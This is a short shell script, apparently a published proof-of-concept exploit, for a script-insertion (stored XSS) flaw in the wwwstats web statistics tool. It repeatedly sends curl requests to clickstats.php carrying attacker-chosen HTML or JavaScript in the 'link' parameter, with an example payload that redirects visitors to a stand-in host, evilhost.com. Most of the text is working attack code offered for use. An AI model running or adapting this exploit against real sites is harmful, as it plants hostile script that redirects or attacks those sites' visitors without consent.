Simple exploit that demonstrates a script insertion vulnerability in wwwstats.
29014ac2d821ffd45216932fc69be04913f562187be248a4fb5138e2905af733
#!/bin/sh
#jolmos@isecauditors.com
if [ $# -ne 3 ]
then
echo "Usage: $0 <target> <hmlt or javascript to inject in downloads> <ranking position>"
echo "Example: $0 http://www.victym.com/wwwstats <script>window.location="http://www.evilhost.com"</script> 100"
exit
fi
echo 'Attacking, wait a moment'
for i in `seq 1 $3`; do echo "$1/clickstats.php?link=$2"; curl "$1/clickstats.php?link=$2" -e 'attack'; done